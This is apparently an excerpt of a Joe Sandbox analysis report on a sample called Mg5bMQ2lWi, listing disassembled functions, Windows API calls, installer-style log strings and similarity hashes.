SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
GetLastError.KERNEL32(000000F5), ref: 00403C1E

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D

Function 004019DC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(006EFC70,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(?,00000000,00008000,006EFC70,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(006EED20,?,00000000,00008000,006EFC70,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE

Strings

n, xrefs: 00401A67, 00401A72, 00401A7E

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID: n
API String ID: 3782394904-3164384496
Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D

Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE

Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A

Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B

Strings

:mm, xrefs: 004055B0
AMPM, xrefs: 00405599
m/d/yy, xrefs: 0040549D
mmmm d, yyyy, xrefs: 004054BF
:mm:ss, xrefs: 004055CA

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C

Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
ExitProcess.KERNEL32 ref: 00403DE5

Strings

Runtime error at 00000000, xrefs: 00403D96, 00403DA9
Error, xrefs: 00403D91
9@, xrefs: 00403D29, 00403D34

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$9@
API String ID: 1220098344-1503883590
Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E

Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD

Function 004030DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE

Strings

%m, xrefs: 004030F3
U1hd.@, xrefs: 00403103

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@$%m
API String ID: 2123368496-1225677667
Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD

Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC

Strings

)q@, xrefs: 00406F3F, 00406E98, 00406EA8, 00406F04, 00406F28, 00406F18, 00406EEF

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: QueryValue
String ID: )q@
API String ID: 3660427363-2284170586
Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99

Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

Analysis Process: Mg5bMQ2lWi.tmpPID: 2200, Parent PID: 4504COMMON

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	90

Executed Functions

Function 0046F68C Relevance: 79.7, APIs: 4, Strings: 41, Instructions: 956COMMON

Download Yara Rule

Strings

Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
Non-default bitness: 32-bit, xrefs: 0046F89F
Time stamp of existing file: (failed to read), xrefs: 0046FA1B
Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
Stripped read-only attribute., xrefs: 0046FEAB
User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
Installing into GAC, xrefs: 004706D1
Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
Dest file exists., xrefs: 0046F99F
Installing the file., xrefs: 0046FEED
Couldn't read time stamp. Skipping., xrefs: 0046FD19
Non-default bitness: 64-bit, xrefs: 0046F893
Dest filename: %s, xrefs: 0046F878
Version of our file: (none), xrefs: 0046FAE0
Existing file is a newer version. Skipping., xrefs: 0046FBE6
Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
Time stamp of our file: %s, xrefs: 0046F97F
Uninstaller requires administrator: %s, xrefs: 00470159
InUn, xrefs: 00470129
Time stamp of existing file: %s, xrefs: 0046FA0F
Failed to strip read-only attribute., xrefs: 0046FEB7
-- File entry --, xrefs: 0046F6DF
Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
Version of existing file: (none), xrefs: 0046FCDE
Same time stamp. Skipping., xrefs: 0046FD39
Time stamp of our file: (failed to read), xrefs: 0046F98B
Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
Will register the file (a type library) later., xrefs: 004704D0
P, xrefs: 0046F72A
Will register the file (a DLL/OCX) later., xrefs: 004704DC
@, xrefs: 0046F794
Dest file is protected by Windows File Protection., xrefs: 0046F8D1
Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
Incrementing shared file count (64-bit)., xrefs: 00470549
, xrefs: 0046FBB3, 0046FD84, 0046FE02
Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
.tmp, xrefs: 0046FF9B
Same version. Skipping., xrefs: 0046FCC9
Incrementing shared file count (32-bit)., xrefs: 00470562
User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$P$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
API String ID: 0-934948074
Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

Function 0042DFC4 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 178
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2

Strings

CheckTokenMembership, xrefs: 0042E02A
advapi32.dll, xrefs: 0042E02F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2252812187-1888249752
Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

Function 00423C1C Relevance: 21.4, APIs: 14, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08

Function 00466ABC Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1657windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42

LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B

Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB

Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8

Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C

Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA

Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39

Part of subcall function 00493C7C: 73A1A570.USER32(00000000,?,?,?), ref: 00493C9E
Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
Part of subcall function 00493C7C: 73A1A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15

Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA

GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0214D868,0214F4BC,?,?,0214F4EC,?,?,0214F53C,?), ref: 00467B3B
AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64

Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082

Strings

STOPIMAGE, xrefs: 00466E80
(Default), xrefs: 0046814D
, xrefs: 00466F4D

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
String ID: $(Default)$STOPIMAGE
API String ID: 3271511185-770201673
Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A

Function 00473F08 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C

Strings

unins???.*, xrefs: 00473F4B
unins, xrefs: 00473FB4

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58

Function 004520C0 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
